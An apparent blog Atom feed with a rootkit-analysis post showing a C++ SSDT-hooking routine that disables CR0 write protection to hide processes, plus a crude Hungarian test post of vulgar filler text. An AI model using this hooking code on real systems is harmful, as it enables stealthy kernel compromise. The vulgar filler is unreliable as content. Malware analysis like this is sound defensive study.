0xArchive Deep dives into Windows Internals and Kernel-mode rootkit analysis. Zola 2026-05-16T00:00:00+00:00 https://malware-lab-source.pages.dev/atom.xml Analyzing a Kernel-Mode Rootkit: Part 1 2026-05-16T00:00:00+00:00 2026-05-16T00:00:00+00:00 Unknown https://malware-lab-source.pages.dev/posts/malware-cikk/ <p>In this initial installment, we dive deep into the mechanics of a sophisticated kernel-mode rootkit recently discovered in the wild. This malware specifically targets Windows x64 environments, utilizing advanced Direct Kernel Object Manipulation (DKOM) techniques to achieve persistent stealth.</p> <h2 id="hooking-ssdt-system-service-dispatch-table">Hooking SSDT (System Service Dispatch Table)</h2> <p>The rootkit's primary evasion mechanism involves intercepting system calls. While PatchGuard (KPP) typically prevents arbitrary modification of the SSDT, this particular strain leverages a novel bypass involving a vulnerable driver primitive to flip the necessary bits.</p> <pre class="giallo" style="color: #F8F8F2; background-color: #282A36;"><code data-lang="cpp"><span class="giallo-l"><span style="color: #8BE9FD;font-style: italic;">NTSTATUS</span><span style="color: #50FA7B;"> HookSystemService</span><span>(</span><span style="color: #8BE9FD;font-style: italic;">ULONG</span><span style="color: #FFB86C;font-style: italic;"> ServiceIndex</span><span>,</span><span style="color: #8BE9FD;font-style: italic;"> PVOID</span><span style="color: #FFB86C;font-style: italic;"> HookFunction</span><span>,</span><span style="color: #8BE9FD;font-style: italic;"> PVOID</span><span style="color: #FF79C6;">*</span><span style="color: #FFB86C;font-style: italic;"> OriginalFunction</span><span>) {</span></span> <span class="giallo-l"><span style="color: #6272A4;"> // Locate the SSDT</span></span> <span class="giallo-l"><span> PSYSTEM_SERVICE_TABLE Ssdt </span><span style="color: #FF79C6;">=</span><span style="color: #50FA7B;"> GetKeServiceDescriptorTable</span><span>();</span></span> <span class="giallo-l"><span style="color: #FF79C6;"> if</span><span> (</span><span style="color: #FF79C6;">!</span><span>Ssdt)</span><span style="color: #FF79C6;"> return</span><span> STATUS_UNSUCCESSFUL;</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span> PULONG ServiceTableBase </span><span style="color: #FF79C6;">=</span><span> (PULONG)Ssdt</span><span style="color: #FF79C6;">-&gt;</span><span>ServiceTableBase;</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #6272A4;"> // Calculate target address (x64 offsets)</span></span> <span class="giallo-l"><span> LONG Offset </span><span style="color: #FF79C6;">=</span><span> (LONG)((ULONG_PTR)HookFunction </span><span style="color: #FF79C6;">-</span><span> (ULONG_PTR)ServiceTableBase);</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #6272A4;"> // Disable Write Protection (CR0) - *DANGEROUS*</span></span> <span class="giallo-l"><span style="color: #50FA7B;"> DisableWP</span><span>();</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #6272A4;"> // Apply Hook</span></span> <span class="giallo-l"><span style="color: #FF79C6;"> *</span><span>OriginalFunction </span><span style="color: #FF79C6;">=</span><span> (PVOID)((ULONG_PTR)ServiceTableBase </span><span style="color: #FF79C6;">+</span><span> (ServiceTableBase[ServiceIndex]</span><span style="color: #FF79C6;"> &gt;&gt;</span><span style="color: #BD93F9;"> 4</span><span>));</span></span> <span class="giallo-l"><span style="color: #50FA7B;"> InterlockedExchange</span><span>((PLONG)</span><span style="color: #FF79C6;">&amp;</span><span>ServiceTableBase[ServiceIndex], (Offset </span><span style="color: #FF79C6;">&lt;&lt;</span><span style="color: #BD93F9;"> 4</span><span>)</span><span style="color: #FF79C6;"> |</span><span> (ServiceTableBase[ServiceIndex]</span><span style="color: #FF79C6;"> &amp; 0x</span><span style="color: #BD93F9;">F</span><span>));</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #50FA7B;"> EnableWP</span><span>();</span></span> <span class="giallo-l"><span style="color: #FF79C6;"> return</span><span> STATUS_SUCCESS;</span></span> <span class="giallo-l"><span>}</span></span></code></pre> <p>By disabling write protection in the CR0 register, the malware briefly opens a window to patch the SSDT pointer. This allows it to redirect execution flow for specific API calls, such as NtQuerySystemInformation, effectively hiding its malicious processes from standard monitoring tools like Task Manager.</p> <div class="callout-warning" role="alert"> <div class="callout-warning__title"> <span class="material-symbols-outlined" aria-hidden="true">warning</span> WARNING </div> <p class="callout-warning__text"> Executing CR0 manipulation on modern systems with Virtualization-Based Security (VBS) or Hypervisor-Enforced Code Integrity (HVCI) enabled will result in an immediate bug check (Blue Screen of Death). </p> </div> Kemeny seggbe kuras 2026-05-16T00:00:00+00:00 2026-05-16T00:00:00+00:00 Unknown https://malware-lab-source.pages.dev/posts/test-cikk/ <h2 id="a-fo-cimdal-a-seggembol-jon-ki-a-szellel">A fo cimdal a seggembol jon ki a szellel</h2> <p>Igazan kemeny a gatyamba a fos</p> <pre class="giallo" style="color: #F8F8F2; background-color: #282A36;"><code data-lang="c"><span class="giallo-l"><span style="color: #FF79C6;"> #include</span><span style="color: #E9F284;"> &lt;</span><span style="color: #F1FA8C;">stdio.h</span><span style="color: #E9F284;">&gt;</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #FF79C6;"> int</span><span style="color: #50FA7B;"> main</span><span>()</span></span> <span class="giallo-l"><span> {</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #50FA7B;"> printf</span><span>(</span><span style="color: #E9F284;">&quot;</span><span style="color: #F1FA8C;">Könyörgöm Pali, tekerj egyet a fitymádon, ha pisálnod kell!</span><span style="color: #E9F284;">&quot;</span><span>);</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #FF79C6;"> return</span><span style="color: #BD93F9;"> 0</span><span>;</span></span> <span class="giallo-l"><span> }</span></span></code></pre><div class="callout-warning" role="alert"> <div class="callout-warning__title"> <span class="material-symbols-outlined" aria-hidden="true">warning</span> WARNING </div> <p class="callout-warning__text"> Ha kosz van a töködön, és olyan mint az avas joghurt megjelennek a fitymanók. </p> </div>